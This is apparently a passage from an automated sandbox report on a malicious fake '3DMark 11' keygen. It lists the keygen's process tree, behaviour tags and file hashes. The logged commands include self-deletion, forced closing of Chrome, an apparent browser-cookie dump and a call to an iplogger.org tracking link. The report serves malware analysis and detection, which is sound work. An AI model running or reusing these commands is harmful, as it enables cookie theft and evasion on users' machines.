wrote to memory of 1032 820 keygen-step-4.exe askinstall21.exe PID 820 wrote to memory of 1032 820 keygen-step-4.exe askinstall21.exe PID 1120 wrote to memory of 2676 1120 aliens.exe msiexec.exe PID 1120 wrote to memory of 2676 1120 aliens.exe msiexec.exe PID 1120 wrote to memory of 2676 1120 aliens.exe msiexec.exe PID 1032 wrote to memory of 2928 1032 askinstall21.exe cmd.exe PID 1032 wrote to memory of 2928 1032 askinstall21.exe cmd.exe PID 1032 wrote to memory of 2928 1032 askinstall21.exe cmd.exe PID 2928 wrote to memory of 824 2928 cmd.exe taskkill.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3DMark 11 Advanced Edition.bin.exe"C:\Users\Admin\AppData\Local\Temp\3DMark 11 Advanced Edition.bin.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:848 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3608 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\intro.exeintro.exe 1O5ZF3⤵
- Executes dropped EXE
PID:3240 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:200 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:348 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:2340
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:212 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exekeygen-step-2.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1240 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL4⤵
- Suspicious use of WriteProcessMemory
PID:3612 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
PID:1264 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3784 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:2800 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:820 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1536 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3092 -
C:\Users\Admin\AppData\Local\Temp\sib68E5.tmp\0\setup.exe"C:\Users\Admin\AppData\Local\Temp\sib68E5.tmp\0\setup.exe" -s5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1176 -
C:\Program Files (x86)\9ku5npt6tedk\aliens.exe"C:\Program Files (x86)\9ku5npt6tedk\aliens.exe"6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1120 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"7⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2676 -
C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exeC:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe 0011 installp17⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:2416 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"8⤵
- Suspicious use of SetWindowsHookEx
PID:3244 -
C:\Users\Admin\AppData\Roaming\1605712587875.exe"C:\Users\Admin\AppData\Roaming\1605712587875.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605712587875.txt"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1864 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"8⤵
- Suspicious use of SetWindowsHookEx
PID:648 -
C:\Users\Admin\AppData\Roaming\1605712592235.exe"C:\Users\Admin\AppData\Roaming\1605712592235.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605712592235.txt"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2444 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"8⤵
- Suspicious use of SetWindowsHookEx
PID:2964 -
C:\Users\Admin\AppData\Roaming\1605712597672.exe"C:\Users\Admin\AppData\Roaming\1605712597672.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605712597672.txt"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:616 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"8⤵
- Suspicious use of SetWindowsHookEx
PID:1048 -
C:\Users\Admin\AppData\Roaming\1605712600360.exe"C:\Users\Admin\AppData\Roaming\1605712600360.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605712600360.txt"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2524 -
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exeC:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2608 -
C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP8⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
PID:3824 -
C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exeC:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe /silent8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1444 -
C:\Users\Admin\AppData\Local\Temp\is-GKG9L.tmp\1021C014A4C9A552.tmp"C:\Users\Admin\AppData\Local\Temp\is-GKG9L.tmp\1021C014A4C9A552.tmp" /SL5="$8005C,761193,121344,C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe" /silent9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2672 -
C:\Program Files (x86)\RearRips\seed.sfx.exe"C:\Program Files (x86)\RearRips\seed.sfx.exe" -pK2j8l614 -s110⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2724 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/14Ahe7"10⤵PID:3984
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe"8⤵PID:1516
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 39⤵
- Runs ping.exe
PID:1600 -
C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exeC:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe 200 installp17⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:204 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe8⤵PID:3756
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe9⤵
- Kills process with taskkill
PID:1404 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\1A27AE19C9E414DC.exe"8⤵PID:3324
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 39⤵
- Runs ping.exe
PID:2108 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\9ku5npt6tedk\aliens.exe"7⤵PID:1560
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 38⤵
- Runs ping.exe
PID:2380 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:2104 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall21.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall21.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1032 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:2928 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:824 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\hjjgaa.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3356 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
PID:3224 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:816
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:3368 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 4BEE831CF17A398554ED20EEEE4EB308 C2⤵
- Loads dropped DLL
PID:3136
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
-
-
-
-
-
-
-
MD5
c615d0bfa727f494fee9ecb3f0acf563
SHA16c3509ae64abc299a7afa13552c4fe430071f087
SHA25695d91febc45d03c1ee477c127bcbd332cd6fbce1e91105004af723594e6f0199
SHA512d97256eb93d8e546f5fb5c61bebe61e7dfab316eb7685be83782bd36b28df3f80880e7b823197a4b6bae1af7b9460c4c81357dd44ed199ab93ccaee5acc10e51
-
MD5
7cc103f6fd70c6f3a2d2b9fca0438182
SHA1699bd8924a27516b405ea9a686604b53b4e23372
SHA256dbd9f2128f0b92b21ef99a1d7a0f93f14ebe475dba436d8b1562677821b918a1
SHA51292ec9590e32a0cf810fc5d15ca9d855c86e5b8cb17cf45dd68bcb972bd78692436535adf9f510259d604e0a8ba2e25c6d2616df242261eb7b09a0ca5c6c2c128
-
MD5
a6279ec92ff948760ce53bba817d6a77
SHA15345505e12f9e4c6d569a226d50e71b5a572dce2
SHA2568b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181
SHA512213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c
-
MD5
a6279ec92ff948760ce53bba817d6a77
SHA15345505e12f9e4c6d569a226d50e71b5a572dce2
SHA2568b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181
SHA512213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c
-
MD5
7fee8223d6e4f82d6cd115a28f0b6d58
SHA11b89c25f25253df23426bd9ff6c9208f1202f58b
SHA256a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59
SHA5123ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4
-
MD5
7fee8223d6e4f82d6cd115a28f0b6d58
SHA11b89c25f25253df23426bd9ff6c9208f1202f58b
SHA256a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59
SHA5123ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4
-
MD5
ef6f72358cb02551caebe720fbc55f95
SHA1b5ee276e8d479c270eceb497606bd44ee09ff4b8
SHA2566562bdcbf775e04d8238c2b52a4e8df5afa1e35d1d33d1e4508cfe040676c1e5
SHA512ea3f0cf40ed3aa3e43b7a19ed6412027f76f9d2d738e040e6459415aa1e5ef13c29ca830a66430c33e492558f7c5f0cc86e1df9474322f231f8506e49c3a1a90
-
MD5
ef6f72358cb02551caebe720fbc55f95
SHA1b5ee276e8d479c270eceb497606bd44ee09ff4b8
SHA2566562bdcbf775e04d8238c2b52a4e8df5afa1e35d1d33d1e4508cfe040676c1e5
SHA512ea3f0cf40ed3aa3e43b7a19ed6412027f76f9d2d738e040e6459415aa1e5ef13c29ca830a66430c33e492558f7c5f0cc86e1df9474322f231f8506e49c3a1a90
-
MD5
ef6f72358cb02551caebe720fbc55f95
SHA1b5ee276e8d479c270eceb497606bd44ee09ff4b8
SHA2566562bdcbf775e04d8238c2b52a4e8df5afa1e35d1d33d1e4508cfe040676c1e5
SHA512ea3f0cf40ed3aa3e43b7a19ed6412027f76f9d2d738e040e6459415aa1e5ef13c29ca830a66430c33e492558f7c5f0cc86e1df9474322f231f8506e49c3a1a90
-
MD5
ef6f72358cb02551caebe720fbc55f95
SHA1b5ee276e8d479c270eceb497606bd44ee09ff4b8
SHA2566562bdcbf775e04d8238c2b52a4e8df5afa1e35d1d33d1e4508cfe040676c1e5
SHA512ea3f0cf40ed3aa3e43b7a19ed6412027f76f9d2d738e040e6459415aa1e5ef13c29ca830a66430c33e492558f7c5f0cc86e1df9474322f231f8506e49c3a1a90
-
MD5
ef6f72358cb02551caebe720fbc55f95
SHA1b5ee276e8d479c270eceb497606bd44ee09ff4b8
SHA2566562bdcbf775e04d8238c2b52a4e8df5afa1e35d1d33d1e4508cfe040676c1e5
SHA512ea3f0cf40ed3aa3e43b7a19ed6412027f76f9d2d738e040e6459415aa1e5ef13c29ca830a66430c33e492558f7c5f0cc86e1df9474322f231f8506e49c3a1a90
-
MD5
ef6f72358cb02551caebe720fbc55f95
SHA1b5ee276e8d479c270eceb497606bd44ee09ff4b8
SHA2566562bdcbf775e04d8238c2b52a4e8df5afa1e35d1d33d1e4508cfe040676c1e5
SHA512ea3f0cf40ed3aa3e43b7a19ed6412027f76f9d2d738e040e6459415aa1e5ef13c29ca830a66430c33e492558f7c5f0cc86e1df9474322f231f8506e49c3a1a90
-
MD5
ef6f72358cb02551caebe720fbc55f95
SHA1b5ee276e8d479c270eceb497606bd44ee09ff4b8
SHA2566562bdcbf775e04d8238c2b52a4e8df5afa1e35d1d33d1e4508cfe040676c1e5
SHA512ea3f0cf40ed3aa3e43b7a19ed6412027f76f9d2d738e040e6459415aa1e5ef13c29ca830a66430c33e492558f7c5f0cc86e1df9474322f231f8506e49c3a1a90
-
MD5
ef6f72358cb02551caebe720fbc55f95
SHA1b5ee276e8d479c270eceb497606bd44ee09ff4b8
SHA2566562bdcbf775e04d8238c2b52a4e8df5afa1e35d1d33d1e4508cfe040676c1e5
SHA512ea3f0cf40ed3aa3e43b7a19ed6412027f76f9d2d738e040e6459415aa1e5ef13c29ca830a66430c33e492558f7c5f0cc86e1df9474322f231f8506e49c3a1a90